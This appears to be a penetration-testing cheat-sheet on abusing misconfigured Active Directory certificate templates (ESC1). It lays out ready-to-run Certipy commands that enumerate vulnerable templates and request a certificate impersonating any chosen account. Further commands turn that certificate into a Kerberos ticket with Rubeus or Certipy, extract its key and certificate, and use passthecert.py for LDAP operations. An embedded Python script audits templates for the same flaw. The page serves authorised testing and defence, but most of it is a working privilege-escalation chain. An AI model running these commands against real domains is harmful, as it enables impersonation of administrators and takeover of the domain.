Certificates in AD
Read the Certified Pre-Owned white-paper to understand certificates and their attack vectors
Certipy
Certipy is incompatible with Python 3.11 and greater at the moment. A quick solution is found here
To enumerate AD for vulnerable certificate templates, we can utilize this command:
sudo certipy-ad find -u 'user@domain' -dc-ip <dc-ip> -vulnerable -enabled
Certipy outputs the configuration details of interest in JSON and TXT files following the naming convention "<DATE-TIMESTAMP>_Certipy"
ESC1
A certificate template with the ESC1 vulnerability allows low-privileged users to enroll and request a certificate for any domain object specified by the user. This means that any user with enrollment rights can request a certificate for a privileged account, such as a domain administrator.
Vulnerable templates have the following configurations:
Client Authentication: True
Enabled: True
Enrollee Supplies Subject: True
Requires Management Approval: False
Authorized Signatures Required: 0
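As an added example (not code from the page or from Certipy), the audit check below decodes the raw template attributes an LDAP query returns into the conditions just listed and flags templates that meet all of them while also being enrollable by broad groups. The msPKI-* attribute names, flag bits and EKU OIDs are the real AD CS values; the sample templates and the `enabled` and `enrollment_rights` fields are constructed for the example.

```python
# Flag bits and EKU OIDs are the real AD CS values; everything else here is constructed.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # bit in msPKI-Enrollment-Flag (manager approval)
CLIENT_AUTH_EKUS = {                     # EKUs that let a certificate authenticate a user
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Groups whose enrollment right makes a template reachable by any low-privileged user.
LOW_PRIV_ENROLLERS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}

def allows_client_auth(ekus):
    """An empty EKU list imposes no restriction, so it also permits client authentication."""
    return not ekus or bool(CLIENT_AUTH_EKUS & set(ekus))

def esc1_conditions(t):
    """Map raw template attributes to the conditions on the page, plus who may enroll."""
    return {
        "Client Authentication": allows_client_auth(t["pKIExtendedKeyUsage"]),
        "Enabled": t["enabled"],  # published on an enterprise CA
        "Enrollee Supplies Subject": bool(t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "Requires Management Approval": bool(t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS),
        "Authorized Signatures Required": t["msPKI-RA-Signature"],
        "Low-Privileged Enrollment": bool(LOW_PRIV_ENROLLERS & set(t["enrollment_rights"])),
    }

def is_esc1(t):
    c = esc1_conditions(t)
    return (c["Client Authentication"] and c["Enabled"] and c["Enrollee Supplies Subject"]
            and not c["Requires Management Approval"]
            and c["Authorized Signatures Required"] == 0 and c["Low-Privileged Enrollment"])

def audit(templates):
    """Names of the templates that meet every ESC1 condition."""
    return [t["name"] for t in templates if is_esc1(t)]

# Constructed samples: FOO_Templ mirrors the page's vulnerable template; User does not let
# the enrollee supply the subject; WebServer only carries the Server Authentication EKU.
TEMPLATES = [
    {"name": "FOO_Templ", "enabled": True, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0, "enrollment_rights": ["Domain Users"]},
    {"name": "User", "enabled": True, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "msPKI-Certificate-Name-Flag": 0xA6000000, "msPKI-Enrollment-Flag": 0x29,
     "msPKI-RA-Signature": 0, "enrollment_rights": ["Domain Users"]},
    {"name": "WebServer", "enabled": True, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
     "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0, "enrollment_rights": ["Domain Users"]},
]
```

Running `audit(TEMPLATES)` returns only `['FOO_Templ']`; the same decoding can be applied to the objects under CN=Certificate Templates in the Configuration naming context.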
The Certipy command required to request a certificate includes the following arguments:
-u : username
-p : compromised user password
-dc-ip : domain controller IP address
-target : target CA (Certificate Authority) DNS (Domain Name System) Name
-ca : short CA Name
-template : vulnerable template name
-upn : target user/object name
The full Certipy command is shown below:
sudo certipy-ad req -u 'user@domain' \
-dc-ip '<dc-ip>' \
-target 'foobar-CA.foobar.com' \
-ca 'foobar-CA' \
-template 'FOO_Templ' \
-upn 'target_user@domain'
If everything goes well, you'll get a certificate <target_user>.pfx which can then be used to request a TGT.
With Rubeus:
Rubeus.exe asktgt /user:<target_user> /certificate:<path_to_cert>.pfx /domain:<domain> /dc:<domain-controller>
With Certipy:
sudo certipy-ad auth -pfx '<path_to_cert>.pfx' -username '<target_user>' -domain '<domain>' -dc-ip '<dc-ip>'
Note that if you get the error "KDC_ERR_PADATA_TYPE_NOSUPP", the KDC does not support PKINIT. You can then instead try to authenticate to LDAP directly with the certificate.
If you use Certipy to retrieve certificates, you can extract the key and the certificate from the PFX by using:
certipy-ad cert -pfx user.pfx -nokey -out user.crt
certipy-ad cert -pfx user.pfx -nocert -out user.key
Then we can use passTheCert.py to perform different LDAP operations.
sudo python3 passthecert.py -action whoami -crt user.crt -key user.key -domain <domain> -dc-ip <dc-ip>